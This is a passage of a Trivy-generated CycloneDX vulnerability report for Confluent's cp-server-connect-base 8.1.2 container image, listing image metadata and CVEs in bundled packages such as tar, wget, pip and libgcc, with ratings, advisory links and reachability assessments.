{
  "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json",
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:b6063ffc-65d0-4247-a579-e6b1a3bcdc90",
  "version": 1,
  "metadata": {
    "timestamp": "2026-05-13T19:55:00+00:00",
    "tools": {
      "components": [
        {
          "type": "application",
          "manufacturer": {
            "name": "Aqua Security Software Ltd."
          },
          "group": "aquasecurity",
          "name": "trivy",
          "version": "0.69.3"
        }
      ]
    },
    "component": {
      "bom-ref": "pkg:oci/cp-server-connect-base@sha256%3Ab99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3?arch=amd64&repository_url=519856050701.dkr.ecr.us-west-2.amazonaws.com%2Fdocker%2Fprod%2Fconfluentinc%2Fcp-server-connect-base",
      "type": "container",
      "supplier": {
        "name": "Confluent"
      },
      "name": "cp-server-connect-base",
      "version": "8.1.2",
      "purl": "pkg:oci/cp-server-connect-base@sha256%3Ab99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3?arch=amd64&repository_url=519856050701.dkr.ecr.us-west-2.amazonaws.com%2Fdocker%2Fprod%2Fconfluentinc%2Fcp-server-connect-base",
      "properties": [
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:105ef694c49cf98454e8ce67500aaf23292418824e5d37a46ae956c7366d65c6"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:139cd03b5327c676cc1f9c846c815580fc5d8290f793bb60333843a50b42f8f6"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:3456cc262e6fc4b5b5012ee4b049bb98e88866f8d6dc734297ea81b59d73cdd0"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:4ba7c8e4cd1aad05ed246873eb3ea12c9a5fb66cba583e0e59401aae880a1d64"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:79997a4849782f1b22141b54f311fa2ba7bd3469498b2939e9796426c0ea8236"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:83d155b4ccf988b33d4e4f8c273637358d2e5dca96bbf1649e1fd65d9ac5b112"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:8dd40df2c8b9331c0becc3bd1054383042396e51e36cc6b16313c9fe7db76aa3"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:9a6cd20dcc7f33e1583bc6a5bd4c6029fbbee5f061b2f166832da7d002e489d5"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:9deac2b3de6c4691d7939e8498310e2ad87497ecb07efddbfe2d338ef61cb805"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:ade1c418f6f28bf8ae8e211832e173ca6e85f7179c3ab087f844266f4d07ae2a"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:b705fd3db651a942aa98a88d769151558418a8af898728c4910647fdc5802068"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:bd1e94cd1b511856d955f06aee612e55ec2fa03ac3a393e33508fdb4ca2439c7"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:bdba2aac265e679aeff49c1cd2f3e69fbee9fb8b4a39cf2353e0258f1fd7ea42"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:db06e71307f487daa04b97112e6298530106daa3a4ffcc5fc65a3e8eaa15a9dd"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:f0f4b4962125121401bda87a2f941015aba1aa6270e9ba85814659ad15fd471d"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:f284b8142d9b5e8d718a1ecbbe53e8845f61aa2781c895e9aeff0e89bcfd9442"
        },
        {
          "name": "aquasecurity:trivy:DiffID",
          "value": "sha256:f4c1ec319a6af9408bc8fac7d8d28072f893e041d36dce78eb94335edcdc5b88"
        },
        {
          "name": "aquasecurity:trivy:ImageID",
          "value": "sha256:9b6c4b47de20dd819c6ee32cceceab8b031aa8863c4f840465a629f0128ee1af"
        },
        {
          "name": "aquasecurity:trivy:Labels:architecture",
          "value": "x86_64"
        },
        {
          "name": "aquasecurity:trivy:Labels:build-date",
          "value": "2026-04-08T04:52:24Z"
        },
        {
          "name": "aquasecurity:trivy:Labels:com.redhat.component",
          "value": "ubi9-minimal-container"
        },
        {
          "name": "aquasecurity:trivy:Labels:com.redhat.license_terms",
          "value": "https://www.redhat.com/en/about/red-hat-end-user-license-agreements#UBI"
        },
        {
          "name": "aquasecurity:trivy:Labels:cpe",
          "value": "cpe:/a:redhat:enterprise_linux:9::appstream"
        },
        {
          "name": "aquasecurity:trivy:Labels:description",
          "value": "Confluent platform server image."
        },
        {
          "name": "aquasecurity:trivy:Labels:distribution-scope",
          "value": "public"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.buildah.version",
          "value": "1.42.2"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.confluent.docker",
          "value": "true"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.confluent.docker.build.number",
          "value": "1980567f"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.confluent.docker.git.id",
          "value": "9ca844d"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.confluent.docker.git.repo",
          "value": "confluentinc/kafka-images"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.k8s.description",
          "value": "The Universal Base Image Minimal is a stripped down image that uses microdnf as a package manager. This base image is freely redistributable, but Red Hat only supports Red Hat technologies through subscriptions for Red Hat products. This image is maintained by Red Hat and updated regularly."
        },
        {
          "name": "aquasecurity:trivy:Labels:io.k8s.display-name",
          "value": "Red Hat Universal Base Image 9 Minimal"
        },
        {
          "name": "aquasecurity:trivy:Labels:io.openshift.tags",
          "value": "minimal rhel9"
        },
        {
          "name": "aquasecurity:trivy:Labels:maintainer",
          "value": "partner-support@confluent.io"
        },
        {
          "name": "aquasecurity:trivy:Labels:name",
          "value": "cp-server-connect-base"
        },
        {
          "name": "aquasecurity:trivy:Labels:org.opencontainers.image.created",
          "value": "2026-04-08T04:52:24Z"
        },
        {
          "name": "aquasecurity:trivy:Labels:org.opencontainers.image.revision",
          "value": "470b852dce8e880416927445bd12327938b329e2"
        },
        {
          "name": "aquasecurity:trivy:Labels:release",
          "value": "8.1.2-1-cp1"
        },
        {
          "name": "aquasecurity:trivy:Labels:summary",
          "value": "Confluent platform server connect base image."
        },
        {
          "name": "aquasecurity:trivy:Labels:url",
          "value": "https://catalog.redhat.com/en/search?searchType=containers"
        },
        {
          "name": "aquasecurity:trivy:Labels:vcs-ref",
          "value": "470b852dce8e880416927445bd12327938b329e2"
        },
        {
          "name": "aquasecurity:trivy:Labels:vcs-type",
          "value": "git"
        },
        {
          "name": "aquasecurity:trivy:Labels:vendor",
          "value": "Confluent"
        },
        {
          "name": "aquasecurity:trivy:Labels:version",
          "value": "9ca844d"
        },
        {
          "name": "aquasecurity:trivy:Reference",
          "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base:8.1.2-cp1-rc260410073355-latest-ubi9"
        },
        {
          "name": "aquasecurity:trivy:RepoDigest",
          "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base@sha256:b99a39839c087be99a5b020096eac2a43c552d41de4d10250f67a056010808a3"
        },
        {
          "name": "aquasecurity:trivy:RepoTag",
          "value": "519856050701.dkr.ecr.us-west-2.amazonaws.com/docker/prod/confluentinc/cp-server-connect-base:8.1.2-cp1-rc260410073355-latest-ubi9"
        },
        {
          "name": "aquasecurity:trivy:SchemaVersion",
          "value": "2"
        },
        {
          "name": "aquasecurity:trivy:Size",
          "value": "1168984064"
        }
      ]
    }
  },
  "components": [],
  "dependencies": [],
  "vulnerabilities": [
    {
      "id": "CVE-2005-2541",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 10,
          "severity": "high",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2005-2541"
        },
        {
          "url": "http://marc.info/?l=bugtraq&m=112327628230258&w=2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2005-2541"
        },
        {
          "url": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c%40%3Cissues.guacamole.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2005-2541"
        }
      ],
      "published": "2005-08-10T04:00:00+00:00",
      "updated": "2026-04-16T00:27:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2",
          "versions": [
            {
              "version": "2:1.34-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java runtime that executes Confluent Platform does not invoke any binaries present in the container. That ensures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-31879",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-31879"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-31879"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-wget/2021-02/msg00002.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31879"
        },
        {
          "url": "https://savannah.gnu.org/bugs/?56909"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20210618-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
        }
      ],
      "published": "2021-04-29T05:15:08+00:00",
      "updated": "2024-11-21T06:06:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java runtime that executes Confluent Platform does not invoke any binaries present in the container. That ensures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2021-3572",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.5,
          "severity": "info",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        20
      ],
      "description": "A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2021-3572"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2021:3254"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2021-3572"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1772014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928707"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928904"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1935913"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1941534"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1955615"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957458"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962856"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1968074"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18874"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27619"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28493"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20095"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28957"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29921"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3572"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2021:4162"
        },
        {
          "url": "https://github.com/advisories/GHSA-5xp3-jfq3-5q8x"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2021-437.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042"
        },
        {
          "url": "https://github.com/pypa/pip/issues/10042#issuecomment-857452480"
        },
        {
          "url": "https://github.com/pypa/pip/pull/9827"
        },
        {
          "url": "https://github.com/skazi0/CVE-2021-3572/blob/master/CVE-2021-3572-v9.0.1.patch"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2021-3572.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-12349.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3572"
        },
        {
          "url": "https://packetstormsecurity.com/files/162712/USN-4961-1.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240621-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4961-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2021-3572"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
        }
      ],
      "published": "2021-11-10T18:15:09+00:00",
      "updated": "2024-11-21T06:21:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2022-27943",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        674
      ],
      "description": "libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-27943"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-27943"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=105039"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=1a770b01ef415e114164b6151d1e55acdee09371"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=9234cdca6ee88badfc00297e72f13dac4e540c79"
        },
        {
          "url": "https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=fc968115a742d9e4674d9725ce9c2106b91b6ead"
        },
        {
          "url": "https://gcc.gnu.org/pipermail/gcc-patches/2022-March/592244.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H424YXGW7OKXS2NCAP35OP6Y4P4AW6VG/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27943"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=28995"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-27943"
        }
      ],
      "published": "2022-03-26T13:15:07+00:00",
      "updated": "2024-11-21T06:56:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "11.5.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "11.5.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "11.5.0-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libgomp@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libstdc%2B%2B@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libgcc@11.5.0-11.el9?arch=x86_64&distro=redhat-9.7"
        },
